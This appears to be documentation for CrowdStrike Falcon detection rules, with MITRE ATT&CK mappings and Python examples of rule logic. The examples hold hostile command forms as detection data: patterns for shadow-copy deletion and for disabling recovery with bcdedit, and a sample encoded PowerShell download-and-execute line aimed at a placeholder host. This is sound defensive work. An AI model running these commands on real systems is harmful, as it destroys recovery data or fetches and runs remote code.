Detection rules for CrowdStrike Falcon data sources. Each rule lists its category, its MITRE ATT&CK technique mapping, an impact rating on confidentiality, integrity and availability (C/I/A), and a description of what it detects.

This category contains 17 detection rules.

| Rule | Category | Technique | Impact (C/I/A) |
| --- | --- | --- | --- |
| Critical Role Modification (Privilege Escalation) | Privilege Escalation | Account Manipulation: Additional Cloud Roles | C:3 / I:3 / A:1 |
| CrowdStrike Hunting: Windows Event Log Clearing | Defense Evasion | Indicator Removal: Clear Windows Event Logs | C:0 / I:3 / A:2 |
| Custom Indicator of Compromise (IoC) Detected | Threat Detection | User Execution | C:3 / I:3 / A:1 |
| Deletion or Deactivation of User Account | Account Manipulation | Account Manipulation | C:0 / I:3 / A:3 |
| Endpoint Network Containment Action | Impact | Account Access Removal | C:0 / I:2 / A:3 |
| Endpoint or XDR Detection Alert | Threat Detection | Command and Scripting Interpreter | C:3 / I:3 / A:2 |
| IP Whitelisting Modification | Defense Evasion | Impair Defenses: Disable or Modify Cloud Firewall | C:1 / I:3 / A:2 |
| Inhibit System Recovery (Shadow Copy Deletion) | Impact | Inhibit System Recovery | C:0 / I:3 / A:3 |
| Major Incident Generated (CrowdScore) | Lateral Movement | Lateral Tool Transfer | C:3 / I:3 / A:3 |
| Multiple Authentication Failures (Possible Brute Force Attack) | Credential Access | Brute Force: Password Guessing | C:3 / I:0 / A:0 |
| OS Credential Dumping Activity | Credential Access | OS Credential Dumping: LSASS Memory | C:3 / I:1 / A:0 |
| Real-Time Response (RTR) Session Execution | Execution | Remote Services | C:3 / I:3 / A:1 |
| Security Defenses Impaired or Policy Disabled | Defense Evasion | Impair Defenses: Disable or Modify Tools | C:0 / I:3 / A:3 |
| Security Policy Disabled or Deleted | Defense Evasion | Impair Defenses: Disable or Modify Tools | C:1 / I:3 / A:3 |
| Suspicious Downloader Execution (Linux/macOS) | Command and Control | Ingress Tool Transfer | C:2 / I:2 / A:0 |
| Suspicious Encoded PowerShell Execution | Execution | Command and Scripting Interpreter: PowerShell | C:3 / I:2 / A:1 |
| Suspicious Native Downloaders (LoLBin) | Command and Control | Ingress Tool Transfer | C:2 / I:2 / A:0 |

Rule Example

Below is an example of a rule definition for Critical Role Modification (Privilege Escalation):

name: "Critical Role Modification (Privilege Escalation)"
description: "New roles have been granted or updated for a user within the CrowdStrike administration console."
category: "Privilege Escalation"
technique: "Account Manipulation: Additional Cloud Roles"
references:
  - "https://attack.mitre.org/techniques/T1098/003/"
dataTypes:
  - crowdstrike
adversary: origin
impact:
  confidentiality: 3
  integrity: 3
  availability: 1
where: >
  exists("log.eventOperationName") && 
  oneOf("log.eventOperationName", ["grantUserRoles", "updateUserRoles"])
groupBy:
  - lastEvent.log.eventUserId
  - lastEvent.log.eventOperationName
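To make the where and groupBy clauses concrete, the following is an added example (not code from this rule set or from CrowdStrike) that evaluates the rule above in Python over a handful of constructed audit events. The field names come from the rule; the event values, and the exact semantics of exists() and oneOf(), are assumptions of this example.

```python
from collections import defaultdict

# Constructed sample events shaped like the CrowdStrike user-activity audit
# records the rule reads (field names taken from the rule; values are made up).
SAMPLE_EVENTS = [
    {"log": {"eventUserId": "admin@example.com", "eventOperationName": "grantUserRoles"}},
    {"log": {"eventUserId": "admin@example.com", "eventOperationName": "grantUserRoles"}},
    {"log": {"eventUserId": "admin@example.com", "eventOperationName": "updateUserRoles"}},
    {"log": {"eventUserId": "svc-automation@example.com", "eventOperationName": "grantUserRoles"}},
    {"log": {"eventUserId": "admin@example.com", "eventOperationName": "deleteUser"}},  # not a role change
    {"log": {"eventUserId": "auditor@example.com"}},                                   # field absent
]

ROLE_OPERATIONS = ["grantUserRoles", "updateUserRoles"]
GROUP_BY = ["log.eventUserId", "log.eventOperationName"]


def get_field(event, path):
    """Resolve a dotted path such as 'log.eventOperationName'; None if any hop is missing."""
    cur = event
    for part in path.split("."):
        if not isinstance(cur, dict) or part not in cur:
            return None
        cur = cur[part]
    return cur


def exists(event, path):
    """Assumed semantics of the rule's exists(): the field is present and non-null."""
    return get_field(event, path) is not None


def one_of(event, path, values):
    """Assumed semantics of the rule's oneOf(): the field equals one of the listed values."""
    return get_field(event, path) in values


def rule_where(event):
    """The rule's where clause, written out as Python."""
    return exists(event, "log.eventOperationName") and one_of(
        event, "log.eventOperationName", ROLE_OPERATIONS
    )


def evaluate(events, group_by=GROUP_BY):
    """Apply the where clause and bucket the matches by the groupBy fields.

    The rule's 'lastEvent.' prefix reads the key from the most recent matching
    event; here the key is taken from each matching event, which amounts to the
    same thing when every event carries both fields.
    """
    groups = defaultdict(list)
    for event in events:
        if rule_where(event):
            key = tuple(get_field(event, path) for path in group_by)
            groups[key].append(event)
    return dict(groups)


if __name__ == "__main__":
    for (user, operation), hits in evaluate(SAMPLE_EVENTS).items():
        print(f"{user}: {operation} x{len(hits)}")
```

Running it yields three groups: two grantUserRoles events and one updateUserRoles event for admin@example.com, and one grantUserRoles event for the automation account. The deleteUser event and the event with no eventOperationName never reach the grouping stage, which is the point of the exists() guard. Every group is a legitimate administrative action until proven otherwise, so triage starts with whether eventUserId is an expected administrator acting under an approved change.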

Rule Details

Critical Role Modification (Privilege Escalation)

New roles have been granted to, or updated for, a user within the CrowdStrike administration console. Confirm that the acting user (eventUserId in the rule) and the roles involved match an approved change; granting roles is how an intruder who already holds console access expands what they can do.

CrowdStrike Hunting: Windows Event Log Clearing

A process execution was detected that attempts to clear Windows Event Logs. Adversaries use this technique to cover their tracks after compromising a host; because the detection is raised from sensor process telemetry rather than from the logs themselves, it survives the clearing it records.

Custom Indicator of Compromise (IoC) Detected

The sensor has detected activity that matches a custom IoC (hash, domain or IP address) supplied by the customer.

Deletion or Deactivation of User Account

An administrator has deactivated or deleted a user account in the Falcon console. Routine offboarding produces the same event, so verify the action against a change record; an unexpected removal of an analyst or administrator account can be an attempt to lock defenders out of the console.

Endpoint Network Containment Action

Containment of a host on the network has been requested, or a previously applied containment has been lifted. Both directions matter: a containment request should correspond to an active investigation, and a lift of containment should be authorized, since releasing a contained host restores the attacker's network access.

Endpoint or XDR Detection Alert

A critical detection summary has been generated from Falcon EPP or XDR indicating malicious activity or attack patterns.

IP Whitelisting Modification

IP addresses have been added to or removed from the CrowdStrike IP whitelist (the allowlist of addresses permitted to reach the console). An attacker with console access could add their own address to keep that access, or remove a legitimate one, to evade this network restriction; confirm each change with the owner of the address involved.

Inhibit System Recovery (Shadow Copy Deletion)

The Falcon agent detected command line activity attempting to delete Volume Shadow Copies or disable recovery options. This is a common and reliable precursor to ransomware encryption, so treat it as an active intrusion rather than a policy violation.
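The command forms behind this rule are well documented under ATT&CK T1490. The following is an added example (not part of this rule set, and not the Falcon sensor's own logic) that checks constructed process command lines for those forms, normalizing case, quoting, full paths and padded whitespace first so that trivial variations do not slip past. The event fields (host, parent, cmdline) are illustrative, not the sensor's schema.

```python
import re

# Well-documented T1490 command forms (ATT&CK: Inhibit System Recovery).
RECOVERY_PATTERNS = [
    ("vssadmin delete shadows",
     re.compile(r"\bvssadmin(?:\.exe)?\s+delete\s+shadows\b")),
    ("vssadmin resize shadowstorage",
     re.compile(r"\bvssadmin(?:\.exe)?\s+resize\s+shadowstorage\b")),
    ("wmic shadowcopy delete",
     re.compile(r"\bwmic(?:\.exe)?\s+shadowcopy\s+delete\b")),
    ("wbadmin delete catalog",
     re.compile(r"\bwbadmin(?:\.exe)?\s+delete\s+catalog\b")),
    ("bcdedit recoveryenabled no",
     re.compile(r"\bbcdedit(?:\.exe)?\b.*\brecoveryenabled\s+no\b")),
    ("bcdedit bootstatuspolicy ignoreallfailures",
     re.compile(r"\bbcdedit(?:\.exe)?\b.*\bbootstatuspolicy\s+ignoreallfailures\b")),
    ("win32_shadowcopy removal via PowerShell/WMI",
     re.compile(r"win32_shadowcopy\b.*(?:remove-wmiobject|remove-ciminstance|\.delete\(\))")),
]


def normalize(cmdline):
    """Lower-case, drop quotes and collapse whitespace so that a full path,
    odd casing or padded spacing does not defeat the match."""
    stripped = cmdline.replace('"', "").replace("'", "")
    return re.sub(r"\s+", " ", stripped).strip().lower()


def check(cmdline):
    """Return the labels of every recovery-inhibiting pattern the command line matches."""
    norm = normalize(cmdline)
    return [label for label, rx in RECOVERY_PATTERNS if rx.search(norm)]


# Constructed process events (field names are illustrative, not the sensor schema).
SAMPLE_EVENTS = [
    {"host": "WS01", "parent": "cmd.exe",
     "cmdline": '"C:\\Windows\\System32\\VSSADMIN.EXE"  Delete  Shadows /All /Quiet'},
    {"host": "WS01", "parent": "cmd.exe",
     "cmdline": "wmic shadowcopy delete"},
    {"host": "SRV02", "parent": "unknown.exe",
     "cmdline": "bcdedit /set {default} recoveryenabled No"},
    {"host": "SRV02", "parent": "explorer.exe",
     "cmdline": "vssadmin list shadows"},                       # benign enumeration
    {"host": "WS03", "parent": "powershell.exe",
     "cmdline": "powershell.exe -c \"Get-WmiObject Win32_ShadowCopy | Remove-WmiObject\""},
    {"host": "SRV04", "parent": "backup-agent.exe",
     "cmdline": "wbadmin get versions"},                        # benign
]


def scan(events):
    """Return (host, parent, labels) for every event matching at least one pattern."""
    hits = []
    for ev in events:
        labels = check(ev["cmdline"])
        if labels:
            hits.append((ev["host"], ev["parent"], labels))
    return hits


if __name__ == "__main__":
    for host, parent, labels in scan(SAMPLE_EVENTS):
        print(f"{host} ({parent}): {', '.join(labels)}")
```

Four of the six constructed events match; the two read-only commands (vssadmin list shadows, wbadmin get versions) do not. The parent process is carried through because it is the first pivot in triage: a shadow copy deletion spawned by a backup agent on a backup server is usually maintenance, while the same command under cmd.exe on a workstation is the ransomware pattern the rule describes. The vssadmin resize shadowstorage form is the noisiest of the set and is the one most worth tuning by parent process and host role.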

Major Incident Generated (CrowdScore)

The CrowdScore engine has consolidated multiple detections into a critical incident, a possible indicator of Lateral Movement or widespread intrusion.

Multiple Authentication Failures (Possible Brute Force Attack)

A user or IP address has failed multiple authentication attempts on the CrowdStrike Falcon console within a short period of time.

OS Credential Dumping Activity

The endpoint agent detected activity commonly associated with OS Credential Dumping. This includes attempts to read or dump LSASS memory using known tools.

Real-Time Response (RTR) Session Execution

A user, or an API client, has initiated a Real-Time Response (RTR) session on an endpoint. RTR grants shell-level access to the host, so confirm that the session maps to a named analyst and an open case; an attacker holding Falcon credentials gets exactly the same access.

Security Defenses Impaired or Policy Disabled

An action was taken on the endpoint that resulted in a critical sensor process or security policy being disabled locally. This strongly indicates defense evasion tampering.

Security Policy Disabled or Deleted

An administrator, or an actor using administrator credentials, has disabled or deleted a security prevention policy in Falcon, which may leave the endpoints assigned to that policy without protection.

Suspicious Downloader Execution (Linux/macOS)

Execution of a native downloader such as curl or wget was detected on a Linux or macOS endpoint making HTTP connections, potentially indicating Ingress Tool Transfer by an adversary.

Suspicious Encoded PowerShell Execution

A PowerShell process was spawned with arguments indicating a base64-encoded command (-enc, -EncodedCommand). Malware and threat actors often use this to evade string-based detection, since the script body never appears in clear text on the command line.
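Two details make this rule harder to write well than it looks: powershell.exe accepts any prefix of -EncodedCommand from -e upward (plus the documented alias -ec), so a search for the literal string "-enc" misses variants, and the payload is base64 over UTF-16LE, so decoding it for triage needs the right text encoding. The following is an added example (not code from this rule set) that handles both over constructed command lines; the sample script and its URL (a reserved .invalid name) are made up for the example.

```python
import base64
import binascii

# Constructed sample: a one-liner an intruder might stage, encoded the way
# PowerShell expects (base64 over UTF-16LE). The URL is a reserved .invalid name.
SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage1.ps1')"
PAYLOAD = base64.b64encode(SCRIPT.encode("utf-16-le")).decode("ascii")

SAMPLE_CMDLINES = [
    f"powershell.exe -NoP -W Hidden -enc {PAYLOAD}",                        # common form
    f'powershell.exe -ec "{PAYLOAD}"',                                      # documented alias, quoted
    f"powershell.exe -E {PAYLOAD}",                                         # shortest prefix, upper case
    "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1",  # benign; -E prefix clash
    "powershell.exe -EncodedCommand not-base64!!",                          # flag present, payload malformed
]


def is_encoded_flag(token):
    """True for -e, -en, -enc ... -EncodedCommand and -ec, any case, '-' or '/' prefix.

    powershell.exe accepts any prefix of EncodedCommand starting at 'e';
    -ex... belongs to ExecutionPolicy and must not match.
    """
    if len(token) < 2 or token[0] not in "-/":
        return False
    name = token[1:].lower()
    return name == "ec" or (name.startswith("e") and "encodedcommand".startswith(name))


def decode_payload(b64):
    """Decode an -EncodedCommand argument; None when it is not valid base64/UTF-16LE."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None


def analyze(cmdline):
    """Return {'flag', 'payload', 'decoded'} for an encoded command line, else None.

    A malformed payload still returns a result (with decoded=None): the flag
    alone is worth an alert, and the raw payload is kept for manual review.
    """
    tokens = cmdline.split()
    for i, tok in enumerate(tokens):
        if is_encoded_flag(tok):
            payload = tokens[i + 1].strip("\"'") if i + 1 < len(tokens) else ""
            return {"flag": tok, "payload": payload, "decoded": decode_payload(payload)}
    return None


def scan(cmdlines):
    """Analyze many command lines; one result (or None) per input, in order."""
    return [analyze(c) for c in cmdlines]


if __name__ == "__main__":
    for line, result in zip(SAMPLE_CMDLINES, scan(SAMPLE_CMDLINES)):
        if result:
            print(f"{result['flag']!r} -> {result['decoded']!r}")
        else:
            print(f"no encoded command: {line}")
```

The three encoded variants all decode to the same script, the -ExecutionPolicy line is correctly left alone even though it starts with -E, and the malformed payload is still reported with the flag that triggered it. In a SIEM the decoded text is what you match further rules against (downloaders, IEX, AMSI bypass strings), not the base64.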

Suspicious Native Downloaders (LoLBin)

Execution of native binaries like certutil, bitsadmin, curl, or wget was detected making external connections, potentially indicating Ingress Tool Transfer by an adversary.